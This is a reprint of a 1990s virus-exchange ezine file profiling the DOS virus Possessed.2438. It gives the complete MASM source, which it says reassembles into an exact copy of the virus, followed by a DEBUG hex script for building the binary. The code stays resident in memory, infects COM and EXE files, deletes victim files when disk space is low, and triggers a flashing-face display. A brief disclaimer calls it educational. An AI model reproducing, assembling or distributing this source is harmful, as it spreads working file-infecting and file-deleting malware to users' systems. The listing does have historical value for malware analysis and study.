Copy Link
Add to Bookmark
Report

Hexfiles Issue 2 File 006

eZine's profile picture
Published in 
hexfiles
 · 4 months ago

  
HEX-FILES No. 2 File 006
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Virus: Possessed.2438
Alias: Possessed 1.06, Possessed II
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: [0:1EC] <> 0

VirusLength: 2438 bytes
InfectiveLength:
COM: 2438 bytes
EXE: 2438 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: File[Eof-1067..Eof-1066] = 41h 4bh
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: Author: A. Gumba & E. Daya of AdU"

"*.COM *.EXE"
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: Author: A. Gumba & E. Daya of AdU"

"COMMAND.COM"
DisplayedText:
If host program EXEC failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 4 hours if it became resident through COMMAND.COM;
After 1 hour from other programs



ÄÄ POS2438.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2438
; Alias: Possessed 1.06, Possessed II
; Author: JonJon Gumba and E. Daya
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, compiled by masm 5.0 This can also be compiled in
; a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
ExeHeader struc
isExeId dw ?
isMod dw ?
isBlocks dw ?
isRelocItemCt dw ?
isHeaderSize dw ?
isMinAlloc dw ?
isMaxAlloc dw ?
isSs dw ?
isSp dw ?
isCxSum dw ?
isIp dw ?
isCs dw ?
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

org 0

MemoryMarkerLoc equ 01ech
SaveSsOnInt21 equ 01f6h
SaveSpOnInt21 equ 01f4h

PossessedEntry:
push es
xor ax,ax
mov es,ax
jmp FirstGenerationEntry

PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: A. Gumba & E. Daya of AdU',10,26

isDos:
jmp DosHandler

DosVersion db ?
FirstGenerationFlag db 1

DosInterrupt label dword
DosIntOffset dw ?
DosIntSegment dw ?

ClockInterrupt label dword
ClockIntOffset dw ?
ClockIntSegment dw ?

ErrorIntOffset dw ?
ErrorIntSegment dw ?
VictimAsciizSegment dw ?
VictimAsciizOffset dw ?
Attribute dw ?
Handle dw ?
FileTime dw ?
FileDate dw ?
ComLength dw ?
AllocatedMemory dw ?
Timer dw ?
Hour db ?
ActivateLength db ?
ViruSs dw ?
ViruSp dw ?
ExeSs dw ?
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?
ExeLengthHi dw ?
Environment dw ?
Psp dw ?

DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx]

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl
mov ExeAsciiz,bl
mov ah,2fh
call UseDos
push es
push bx
mov ah,1ah
mov dx,offset SaveVictimCode
call UseDos
mov cx,21h
mov dx,offset ComAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx
pop ds
mov ah,1ah
call UseDos
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect
jmp PassToDos
InfectOthersFirst:
mov dx,offset SaveVictimCode
add dx,28
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl
mov byte ptr [bx+01],':'
call SaveRegistersBeforeInfect
jmp InfectExecutingProgram
SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

assume cs:Possessed, ds:nothing

RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret
PassToDos:
popf
jmp DosInterrupt
SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName
CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters
GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb

assume cs:Possessed, ds:Possessed

push ds
push dx
push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt

mov Attribute,cx
mov ax,4301h
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1

mov Handle,ax
mov bx,ax
mov ax,5700h
call UseDos

mov FileDate,dx

mov FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h
call UseDos
jc Relay1

EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx

mov bx,Handle
mov ax,4202h
call UseDos
jc Relay2
mov ComLength,ax
call MovePointerBegin
Relay2:
jc Relay3
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay3:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h
je DoneWithFile
jmp NotInfected

InfectCheckCom:
mov si,cx
sub si,(offset VirusStack-offset FaceData)
js Relay4
cmp word ptr [si],4b41h
je DoneWithFile
Relay4:
jmp NotInfected

DoneWithFile:
mov es,AllocatedMemory
mov ah,49h
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h
call UseDos
mov ah,3eh
call UseDos
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h
call UseDos
jmp RestoreRegisters
NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1

assume cs:Possessed, ds:Possessed

pop ds
mov ActivateLength,1
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler
mov di,offset NameofVictim
call Compare
pushf
neg al
call Scrambler
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateTime
Relay5:
jmp DoneWithFile
SetActivateTime:
mov ActivateLength,4
jmp EnoughDiskSpace

CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jnc EnoughDiskSpace
jmp DeleteFile

assume cs:Possessed, ds:nothing

EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay5

mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile

Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ?
LocEndOfFile dw ?

assume cs:Possessed, ds:Possessed

isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
pop es
push cs
pop ds
mov dx,ComLength
cmp ActivateLength,4
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h)
mov LocComEntry,dx
jmp JumperSet

ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds
mov cx,ComLength
cmp ActivateLength,4
jne NotCommandCom
sub cx,offset VirusStack
NotCommandCom:
xor dx,dx
mov ah,40h
call UseDos
jnc WriteOk
Relay6:
jmp Relay5
WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay6
jmp DoneWithFile

DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile

PixelRow equ Environment+100h
PixelColumn equ Psp+100h

isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt
ShowTime:
popf
mov ax,6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate
EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay7
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h
call UseDos
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay7:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret
UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret

MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

MoveCursor:
mov ah,2
xor bx,bx
int 10h
ret

Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'A'+25h
db '.'+25h,' '+25h,'G'+25h,'u'+25h,'m'+25h
db 'b'+25h,'a'+25h,' '+25h,'&'+25h,' '+25h
db 'E'+25h,'.'+25h,' '+25h,'D'+25h,'a'+25h
db 'y'+25h,'a'+25h,' '+25h,'o'+25h,'f'+25h
db ' '+25h,'A'+25h,'d'+25h,'U'+25h,10+25h
db 26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

ExeEntry:
push es
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0
jne ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory

ExecuteExeVictim:
pop es
mov ax,es

add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h

SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,(offset FaceData-offset EncryptedPossessedId)
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ds:ExeEntry
add ax,(3521h-3306h)
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode
NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+03],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName
CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam

cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted

OldDos:
int 21h
VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h

NameofVictim db 13 dup (?)

ComEntry:
add si,100h
push es
xor ax,ax
mov es,ax

cmp word ptr es:MemoryMarkerLoc,0
je NotInMemory
pop es
sub si,5ah ;(VirusStack-SaveVictimCode)
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
mov bx,100h
clc
jmp bx

assume cs:Possessed, ds:Possessed

NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es
push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es
jmp cs:DosInterrupt+100h

SaveVictimCode db 90 dup (?)
VirusStack dw ?
VirusAsciiz db 13 dup (?)
ExecParam dw 7 dup (?)

Possessed ends

end PossessedEntry

ÄÄ POS2438.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


ÄÄ POS2438.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N POS2438.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AA 0B 4D 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 41 2E 20
E 0140 47 75 6D 62 61 20 26 20 45 2E 20 44 61 79 61 20
E 0150 6F 66 20 41 64 55 0A 1A 6F 75 67 68 74 20 74 6F
E 0160 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45 58
E 0170 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A 0A 48
E 0180 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75 74
E 0190 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72 65
E 01A0 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C 65
E 01B0 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D 70
E 01C0 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69 6D 61
E 01D0 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 62 72
E 01E0 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79 20 74
E 01F0 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65 20 6F
E 0200 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69
E 0210 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A 70 65
E 0220 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65
E 0230 73 20 74 68 69 73 20 76 69 72 69 69 20 62 65 61
E 0240 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E 73 69
E 0250 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73 2F 68
E 0260 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A 54 68
E 0270 69 73 20 76 69 72 69 69 20 69 73 20 73 74 72 69
E 0280 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61 74 69
E 0290 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65 73 65
E 02A0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02B0 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07 01 B4
E 02C0 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 4A 07 0D
E 02D0 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21 20
E 02E0 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21 24
E 02F0 08 20 0A 0D 41 75 74 68 6F 72 3A 20 41 2E 20 47
E 0300 75 6D 62 61 20 26 20 45 2E 20 44 61 79 61 20 6F
E 0310 66 20 41 64 55 0A 1A EB 37 90 06 00 4A 00 C5 0D
E 0320 2E 03 C5 0D B3 04 85 0E 08 04 35 05 20 00 05 00
E 0330 0A 22 68 24 C7 01 2E 0F 7B 01 01 01 08 04 0A 06
E 0340 00 00 00 00 00 00 00 00 00 00 00 00 6F 0E 75 0E
E 0350 9C 3D 00 4B 75 7C 1E 06 56 57 50 53 51 52 8B DA
E 0360 8A 1F 0E 1F 88 1E 00 07 88 1E 08 07 B4 2F E8 1C
E 0370 04 06 53 B4 1A BA 2C 09 E8 12 04 B9 21 00 BA 00
E 0380 07 B4 4E E8 07 04 73 1F BA 08 07 B4 4E E8 FD 03
E 0390 73 15 5A 1F B4 1A E8 F4 03 5A 59 5B 58 5F 5E 07
E 03A0 1F E8 1A 00 EB 2C 90 BA 2C 09 83 C2 1C 8B DA 8A
E 03B0 0E 00 07 88 0F C6 47 01 3A E8 02 00 EB D4 1E 06
E 03C0 56 57 50 53 51 52 EB 10 90 5A 59 5B 58 5F 5E 07
E 03D0 1F C3 9D 2E FF 2E 55 00 2E 8C 1E 61 00 2E 89 16
E 03E0 63 00 8B F2 83 C6 02 8B DE 80 3C 5C 75 06 8B DE
E 03F0 43 EB 06 90 80 3C 00 74 15 46 EB ED B8 24 25 2E
E 0400 8B 16 5D 00 2E 8E 1E 5F 00 E8 81 03 EB BB 8B F3
E 0410 0E 07 BF D6 08 B9 0D 00 FC F3 A4 1E 52 06 1F B8
E 0420 24 35 E8 68 03 8C 06 5F 00 89 1E 5D 00 B8 24 25
E 0430 BA B3 04 E8 57 03 5A 1F B8 00 43 E8 4F 03 72 BC
E 0440 2E 89 0E 65 00 B8 01 43 B9 20 00 E8 3F 03 72 EE
E 0450 B8 02 3D E8 37 03 72 E6 2E A3 67 00 8B D8 B8 00
E 0460 57 E8 29 03 2E 89 16 6B 00 2E 89 0E 69 00 BB FE
E 0470 FF B4 48 E8 17 03 73 07 B4 48 E8 10 03 72 BF 2E
E 0480 A3 6F 00 33 C9 8B D1 2E 8B 1E 67 00 B8 02 42 E8
E 0490 FB 02 72 07 2E A3 6D 00 E8 0D 03 72 11 2E 8B 0E
E 04A0 6D 00 33 D2 2E 8E 1E 6F 00 B4 3F E8 DF 02 72 25
E 04B0 0E 07 33 F6 81 3C 4D 5A 75 0A 81 7C 12 70 19 74
E 04C0 14 EB 4E 90 8B F1 81 EE 2B 04 78 06 81 3C 41 4B
E 04D0 74 03 EB 3D 90 2E 8E 06 6F 00 B4 49 E8 AE 02 2E
E 04E0 8B 1E 67 00 2E 8B 16 6B 00 2E 8B 0E 69 00 B8 01
E 04F0 57 E8 99 02 B4 3E E8 94 02 2E 8E 1E 61 00 2E 8B
E 0500 16 63 00 2E 8B 0E 65 00 B8 01 43 E8 7F 02 E9 B8
E 0510 FE 06 2E 8E 1E 61 00 2E 8B 36 63 00 8A 14 80 EA
E 0520 40 1F C6 06 74 00 01 BE 08 05 B9 0B 00 B0 17 E8
E 0530 88 02 BF D6 08 E8 8C 02 9C F6 D8 E8 7C 02 9D 72
E 0540 11 80 3E 53 00 03 73 02 EB 8B C6 06 74 00 04 EB
E 0550 18 90 B4 36 E8 36 02 33 D2 F7 E3 F7 E1 0B D2 75
E 0560 08 3D C4 09 73 03 E9 AB 00 2E 8B 1E 67 00 E8 37
E 0570 02 72 D5 2E 8E 1E 6F 00 33 F6 81 3C 4D 5A 75 13
E 0580 E9 40 01 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AA
E 0590 0B 4D 0B 1E 1E BF 2C 09 B9 2D 00 FC F3 A5 07 0E
E 05A0 1F 8B 16 6D 00 80 3E 74 00 04 75 0F 89 16 CA 02
E 05B0 81 EA A3 FF 89 16 C8 02 EB 13 90 52 81 C2 E3 09
E 05C0 89 16 C8 02 5A 81 C2 86 09 89 16 CA 02 BE BC 02
E 05D0 33 FF B9 08 00 FC F3 A5 BE 08 00 B9 24 00 FC F3
E 05E0 A5 E8 C4 01 1F 2E 8B 0E 6D 00 2E 80 3E 74 00 04
E 05F0 75 04 81 E9 86 09 33 D2 B4 40 E8 90 01 73 03 E9
E 0600 46 FF 0E 1F BA 00 00 B9 86 09 B4 40 E8 7E 01 72
E 0610 EE E9 C1 FE 2E 8E 1E 61 00 2E 8B 16 63 00 B4 41
E 0620 E8 6A 01 E9 AF FE 9C 2E FF 06 71 00 75 07 2E FE
E 0630 0E 73 00 74 06 9D 2E FF 2E 59 00 9D B8 06 00 CD
E 0640 10 0E 1F 33 DB 33 D2 BE 5B 05 C7 06 85 01 C8 00
E 0650 C7 06 87 01 00 00 E8 3E 00 C7 06 85 01 C9 00 C7
E 0660 06 87 01 01 00 E8 2F 00 C7 06 85 01 BD 00 C7 06
E 0670 87 01 FF FF E8 20 00 C7 06 85 01 C9 00 C7 06 87
E 0680 01 FF FF E8 11 00 C7 06 85 01 BD 00 C7 06 87 01
E 0690 01 00 E8 02 00 EB B0 56 B0 01 B9 02 00 51 56 8A
